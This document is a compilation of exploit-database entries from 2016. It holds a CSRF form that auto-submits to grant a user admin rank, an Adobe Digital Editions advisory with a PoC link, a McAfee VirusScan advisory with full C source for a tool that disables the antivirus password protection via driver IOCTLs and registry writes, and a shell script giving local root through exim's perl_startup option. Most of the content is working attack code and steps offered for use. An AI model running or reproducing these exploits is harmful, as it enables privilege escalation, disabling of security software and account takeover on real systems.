2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure

Disclaimer:
I cannot be held accountable for anything you do with this code. 
You take responsibility for your own actions. For educational and testing purposes only.
-->

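<html>
    <!-- Auto-submitted POST to console.php (cID=8); the hidden fields carry the rank change -->
    <form action="http://site.com/clan/members/console.php?cID=8" method="POST">
      <input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
      <input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
      <input type="hidden" name="reason" value=""/>
      <input type="hidden" name="freezetime" value="0"/>
      <input type="hidden" name="submit" value="Set+Rank"/>
    </form>
	<script>
	// The form has an <input name="submit">, which shadows form.submit();
	// borrow submit() from a fresh form element instead.
	document.createElement('form').submit.call(document.forms[0]);
	// Redirect admin after CSRF takes place to avoid pop-up notification
	// (a JS comment; the original used an HTML <!-- --> comment inside <script>,
	// which only works through browsers' legacy HTML-like-comment handling).
	window.location.href = "http://site.com/clan/members/";
	</script>
</html>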
            
########################################################################################
 
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
 
########################################################################################
 
===================
Introduction:
===================
 Adobe® Digital Editions software offers an engaging way to view and manage eBooks and 
 other digital publications. Use it to download and purchase digital content, which can 
 be read both online and offline. Transfer copy-protected eBooks from your personal 
 computer to other computers or devices. Organize your eBooks into a custom library and 
 annotate pages. Digital Editions also supports industry-standard eBook formats, 
 including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)

########################################################################################
 
===================
Report Timeline:
===================
 2015-10-24: Pier-Luc Maltais from COSIG found the issue and reported it to Adobe PSIRT.
 2016-03-08: Vendor fixed the issue (APSB16-06).
 2016-03-08: Release of this advisory.

########################################################################################
 
===================
Technical details:
===================
 A critical memory corruption occurs when Adobe Digital Editions handles a specially
 crafted ExtGstate object, which could lead to remote code execution.
 
########################################################################################
 
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
 
########################################################################################
            
/*
Security Advisory       @ Mediaservice.net Srl
(#01, 13/04/2016)        Data Security Division

         Title:  McAfee VirusScan Enterprise security restrictions bypass
   Application:  McAfee VirusScan Enterprise 8.8 and prior versions
      Platform:  Microsoft Windows
   Description:  A local Windows administrator is able to bypass the
    security restrictions and disable the antivirus engine
    without knowing the correct management password
        Author:  Maurizio Agazzini <inode@mediaservice.net>
 Vendor Status: Fixed
    References: http://lab.mediaservice.net/advisory/2016-01-mcafee.txt
                http://lab.mediaservice.net/code/mcafee_unprotector.c

1. Abstract.

McAfee VirusScan Enterprise has a feature to protect the scan engine
from local Windows administrators. A management password is needed to
disable it, unless Windows is running in "Safe Mode".

From our understanding this feature is implemented insecurely: the
McAfee VirusScan Console checks the password and requests the engine to
unlock the safe registry keys. No checks are done by the engine itself,
so anyone can directly request the engine to stop without knowing the
correct management password.

2. Example Attack Session.

The attack can be reproduced in different ways, here are some examples.

Example 1:

Open the McAfee VirusScan Console and Sysinternals Process Explorer.

Under Process Explorer:

- Locate the mcconsol.exe process
- Type CTRL+L (show lower pane)
- Search for all "HKLM\SOFTWARE\McAfee\DesktopProtection" keys
- Close all the handles of this registry key

Go back to the McAfee Console and:

- Go to: Tools -> General Options
- Select the "Password Options" tab
- Select "No password" and apply settings

Now it is possible to stop the antivirus engine.

Example 2:

A specific tool has been written to request to disable password
protection. After running the tool you can disable it via the VirusScan
Console.

Code: http://lab.mediaservice.net/code/mcafee_unprotector.c

3. Affected Platforms.

All McAfee VirusScan Enterprise versions prior to 8.8 without SB10151 are
affected. Exploitation of this vulnerability requires that an attacker
has local Windows administrator privileges.

4. Fix.

On 25 February 2016, the SB10151 hotfix was released by McAfee,
which fixes the described vulnerability.

https://kc.mcafee.com/corporate/index?page=content&id=SB10151

5. Proof Of Concept.

See Example Attack Session above.

6. Timeline

07/11/2014 - First communication sent to McAfee
17/11/2014 - Second communication sent to McAfee
17/11/2014 - McAfee: Request to resend the vulnerability information
18/11/2014 - Sent vulnerability information and PoC again
11/12/2014 - McAfee: Problem confirmed
09/03/2015 - Request for update to McAfee
06/05/2015 - Request for update to McAfee
06/05/2015 - McAfee: Patch release planned for Q3
20/08/2015 - McAfee: Request for deadline delay (31/03/2016)
25/02/2016 - McAfee: SB10151 patch has been released

Copyright (c) 2014-2016 @ Mediaservice.net Srl. All rights reserved.

-- 
Maurizio Agazzini                     CISSP, CSSLP, OPST
Senior Security Advisor
@ Mediaservice.net Srl                Tel: +39-011-32.72.100
Via Santorelli, 15                    Fax: +39-011-32.46.497
10095 Grugliasco (TO) ITALY           http://mediaservice.net/disclaimer

"C programmers never die. They are just cast into void"
*/

/*****************************************************************************
 *                                                                           *
 * McAfee Data Protector "Unprotector"                                       *
 *                                                                           *
 * A little tool to request McAfee scan engine to disable password           *
 * protection.                                                               *
 *                                                                           *
 * Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt         *
 *                                                                           *
 * This program can be compiled with MinGW (http://www.mingw.org/)           *
 *                                                                           *
 * Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved            *
 * Wrote by Maurizio Agazzini <inode[at]mediaservice.net>                    *
 *                                                                           *
 * This program is free software; you can redistribute it and/or             *
 * modify it under the terms of the GNU General Public License               *
 * as published by the Free Software Foundation; either version 2            *
 * of the License, or (at your option) any later version.                    *
 *                                                                           *
 * This program is distributed in the hope that it will be useful,           *
 * but WITHOUT ANY WARRANTY; without even the implied warranty of            *
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the             *
 * GNU General Public License for more details.                              *
 *                                                                           *
 * You should have received a copy of the GNU General Public License         *
 * along with this program; if not, write to the Free Software               *
 * Foundation, Inc., 59 Temple Place                                         *
 * Suite 330, Boston, MA  02111-1307, USA.                                   *
 *                                                                           *
 *****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

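/*
 * Opens the McAfee WGUARDNT control device, trying the plain and Global\
 * object names first with read-only and then with read/write access.
 *
 * Returns the open handle, or NULL when every attempt fails.
 *
 * CreateFile() signals failure with INVALID_HANDLE_VALUE rather than NULL, so
 * the original "== NULL" comparisons never detected a failed open and the
 * fallback names/access modes were never tried; the check below uses the
 * value CreateFile() actually returns.
 */
HANDLE opendevice()
{
  static const char *names[] = { "\\\\.\\WGUARDNT", "\\\\.\\Global\\WGUARDNT" };
  static const DWORD access[] = { GENERIC_READ, GENERIC_READ | GENERIC_WRITE };
  size_t a, n;

  /* Same order as before: both names read-only, then both names read/write. */
  for (a = 0; a < sizeof(access) / sizeof(access[0]); a++)
  {
    for (n = 0; n < sizeof(names) / sizeof(names[0]); n++)
    {
      HANDLE h = CreateFile(names[n], access[a], 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
      if (h != INVALID_HANDLE_VALUE && h != NULL)
        return h;
    }
  }

  return NULL;
}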


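/*
 * Opens HKLM\SOFTWARE\McAfee\DesktopProtection with the requested access,
 * falling back to the Wow6432Node view of the same key.
 *
 * Returns TRUE and stores the key in *out on success; FALSE (and *out == NULL)
 * when neither path can be opened.
 *
 * The original code spelled the fallback path "SOFTWARE\\\Wow6432Node\McAfee",
 * whose stray escapes (\W, \M) drop the separator between Wow6432Node and
 * McAfee; the path here matches the key named in the comment block in main().
 */
static BOOL open_protection_key(REGSAM access, HKEY *out)
{
	static const char *paths[] = {
		"SOFTWARE\\McAfee\\DesktopProtection",
		"SOFTWARE\\Wow6432Node\\McAfee\\DesktopProtection"
	};
	size_t i;

	for (i = 0; i < sizeof(paths) / sizeof(paths[0]); i++)
	{
		if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, paths[i], 0, access, out) == ERROR_SUCCESS)
			return TRUE;
	}

	*out = NULL;
	return FALSE;
}

/*
 * Asks the scan engine (IOCTL 0x9EDB6514) to protect its registry keys again
 * and releases the device handle.  Called on every exit path after the
 * unlock request has been sent.
 */
static void restore_protection(HANDLE dev)
{
	DWORD BytesReturned = 0;

	printf(" [-] Ok John, take the control again!\n");
	DeviceIoControl(dev, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
	CloseHandle(dev);
}

/*
 * Entry point.
 *
 *   argv[1]  optional new UIPMode value (default 0, "No password")
 *
 * Reads the current UIPMode, asks the scan engine through the WGUARDNT device
 * (IOCTL 0x9EDB6510) to stop protecting its registry keys, writes the new
 * UIPMode, prints the command needed to restore the old value, and finally
 * asks the engine to resume protection (IOCTL 0x9EDB6514).
 *
 * Returns 0 on success, 1 when the key, the value or the device cannot be
 * opened.
 *
 * Detection note: the observable events of this bypass are a process other
 * than the McAfee console opening \\.\WGUARDNT and issuing these IOCTLs, and a
 * write to HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode.
 */
int main(int argc, char ** argv)
{
	HKEY reg_key = NULL;
	HANDLE p;
	DWORD BytesReturned = 0;
	DWORD data = 0;
	DWORD size = sizeof(DWORD);
	DWORD type = REG_DWORD;
	DWORD data1 = 0;

	/* Human-readable meaning of each UIPMode value, indexed by value. */
	static const char *status[] = {
		"No password",
		"Password protection for all items listed",
		"Password protection for the selected items",
		"Password protection for conformance to Common Criteria"
	};
	const DWORD status_count = (DWORD)(sizeof(status) / sizeof(status[0]));

	printf("\n *******************************************\n");
	printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
	printf(" *******************************************\n\n");

	/*
	 * The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
	 * disable the password protection, but you can also access to others useful
	 * keys.
	 *
	 * User Password
	 * HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
	 * HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
	 *
	 * Buffer protection
	 * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
	 *
	 * Access protection
	 * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
	 *
	 * On Access Scanner
	 * HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
	 * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
	 *
	 * Others
	 * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
	 *
	 */

	/* 0x0200 is kept from the original access mask (presumably the WOW64
	 * 32-bit-view flag); it is only needed for the read-only open. */
	if (!open_protection_key(KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key))
	{
		printf("Error opening registry key...\n");
		return 1;
	}

	/* Check current status of McAfee protection */
	if (RegQueryValueEx(reg_key, "UIPMode", NULL, &type, (BYTE *)&data, &size) != ERROR_SUCCESS)
	{
		printf("Error reading UIPMode...\n");
		RegCloseKey(reg_key);
		return 1;
	}

	RegCloseKey(reg_key);

	/* UIPMode is read from the registry: only index the table when in range,
	 * otherwise the original code read past the end of status[]. */
	printf(" [+] Current UIPMode = %d (%s)\n\n", data,
	       data < status_count ? status[data] : "unknown");

	/* Open McAfee magic device */
	p = opendevice();
	if (p == NULL || p == INVALID_HANDLE_VALUE)
	{
		printf("Error opening WGUARDNT device...\n");
		return 1;
	}

	printf(" [-] Please John, let me write to your registry keys...");

	/* Request to the scan engine to stop protect registry keys */
	DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);

	/* The original retried the very same native path twice here; the helper
	 * now tries the Wow6432Node view as the second attempt, as the read-only
	 * open above does. */
	if (!open_protection_key(KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key))
	{
		printf(" hmmm hmmm something went wrong!\n\n");
		restore_protection(p);
		return 1;
	}

	printf(" OK\n");

	if (argc > 1)
		data1 = (DWORD)atoi(argv[1]);

	/* Disable McAfee protection */
	if (RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
		printf("\n hmmm hmmm something went wrong!\n");
	else
		printf("\n [+] Thank you! now we got the control! UIPMode = %d\n", data1);

	RegCloseKey(reg_key);

	printf("\n [+] Run \"%s %d\" to get original settings\n\n", argv[0], data);

	/* Tell the engine to take control again */
	restore_protection(p);

	return 0;
}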
            
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# Running exim with the "perl_startup" argument (-ps) while the perl
# environment is under the caller's control forces a perl module of the
# caller's choosing to load; that can be used to write files as root or,
# as here, to spawn a shell.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic

echo "[ CVE-2016-1531 local root exploit"

# Module picked up through PERL5OPT=-Mroot below.  The quoted delimiter
# keeps the heredoc body literal (it contains no shell expansions anyway).
cat > /tmp/root.pm << 'EOF'
package root;
use strict;
use warnings;

system("/bin/sh");
EOF

PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps